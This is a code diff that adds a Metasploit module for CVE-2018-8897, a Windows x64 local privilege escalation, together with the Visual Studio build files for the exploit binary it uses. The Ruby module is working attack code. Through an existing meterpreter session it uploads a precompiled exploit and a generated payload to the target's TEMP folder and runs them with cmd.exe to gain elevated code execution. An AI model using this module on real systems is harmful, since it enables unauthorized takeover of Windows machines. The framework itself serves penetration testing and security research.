--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2018-8897-exe", "cve-2018-8897-exe.vcxproj", "{270A69FF-C7BA-433D-9AF0-F16DED29C5DB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{270A69FF-C7BA-433D-9AF0-F16DED29C5DB}.Debug|Win32.ActiveCfg = Debug|Win32
+		{270A69FF-C7BA-433D-9AF0-F16DED29C5DB}.Debug|Win32.Build.0 = Debug|Win32
+		{270A69FF-C7BA-433D-9AF0-F16DED29C5DB}.Release|Win32.ActiveCfg = Release|x64
+		{270A69FF-C7BA-433D-9AF0-F16DED29C5DB}.Release|Win32.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj
new file mode 100755
index 0000000000..c124b891dd
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj
@@ -0,0 +1,160 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="Error.h" />
+    <ClInclude Include="KernelRoutines.h" />
+    <ClInclude Include="LockedMemory.h" />
+    <ClInclude Include="Native.h" />
+    <ClInclude Include="NtDefines.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2018-8897-exe.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Native.asm" />
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{270A69FF-C7BA-433D-9AF0-F16DED29C5DB}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>cve20188897exe</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj.filters b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj.filters
new file mode 100755
index 0000000000..1c3f77bb1c
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj.filters
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="KernelRoutines.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="LockedMemory.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="Native.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="NtDefines.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="Error.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2018-8897-exe.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Native.asm">
+      <Filter>Source Files</Filter>
+    </MASM>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/modules/exploits/windows/local/mov_ss.rb b/modules/exploits/windows/local/mov_ss.rb
new file mode 100644
index 0000000000..78570c6e74
--- /dev/null
+++ b/modules/exploits/windows/local/mov_ss.rb
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in a statement in the system programming guide
+        of the Intel 64 and IA-32 architectures software developer's manual being mishandled
+        in various operating system kerneles, resulting in unexpected behavior for #DB
+        excpetions that are deferred by MOV SS or POP SS.
+
+        This module will upload the pre-compiled exploit and use it to execute the final
+        payload in order to gain remote code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nick Peterson',        # Original discovery (@nickeverdox)
+          'Nemanja Mulasmajic',   # Original discovery (@0xNemi)
+          'Can Bölük <can1357>',  # PoC
+          'bwatters-r7'           # msf module
+        ],
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        =>
+        [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 08 2018',
+      'References'     =>
+        [
+          ['CVE', '2018-8897'],
+          ['EDB', '44697'],
+          ['BID', '104071'],
+          ['URL', 'https://github.com/can1357/CVE-2018-8897/'],
+          ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
+    ))
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptInt.new('EXECUTE_DELAY',
+        [false, 'The number of seconds to delay before executing the exploit', 3])
+    ])
+  end
+
+  def setup
+    super
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
+    @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
+    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    @payload_path = "#{temp_path}\\#{payload_name}"
+    @exploit_path = "#{temp_path}\\#{exploit_name}"
+    @payload_exe = generate_payload_exe
+  end
+
+  def validate_active_host
+    begin
+      host = session.session_host
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_remote_path(path)
+    unless directory?(path)
+      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def ensure_clean_destination(path)
+    if file?(path)
+      print_status("#{path} already exists on the target. Deleting...")
+      begin
+        file_rm(path)
+        print_status("Deleted #{path}")
+      rescue Rex::Post::Meterpreter::RequestError => e
+        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        print_error("Unable to delete #{path}")
+      end
+    end
+  end
+
+  def ensure_clean_exploit_destination
+    ensure_clean_destination(exploit_path)
+  end
+
+  def ensure_clean_payload_destination
+    ensure_clean_destination(payload_path)
+  end
+
+  def upload_exploit
+    local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
+    upload_file(exploit_path, local_exploit_path)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+  end
+
+  def upload_payload
+    write_file(payload_path, payload_exe)
+    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+  end
+
+  def execute_exploit
+    sleep(datastore['EXECUTE_DELAY'])
+    print_status("Running exploit #{exploit_path} with payload #{payload_path}")
+    output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
+    vprint_status(output)
+  end
+
+  def exploit
+    begin
+      validate_active_host
+      validate_target
+      validate_remote_path(temp_path)
+      ensure_clean_exploit_destination
+      ensure_clean_payload_destination
+      upload_exploit
+      upload_payload
+      execute_exploit
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error(e.message)
+      ensure_clean_exploit_destination
+      ensure_clean_payload_destination
+    end
+  end
+
+  attr_reader :exploit_name
+  attr_reader :payload_name
+  attr_reader :payload_exe
+  attr_reader :temp_path
+  attr_reader :payload_path
+  attr_reader :exploit_path
+end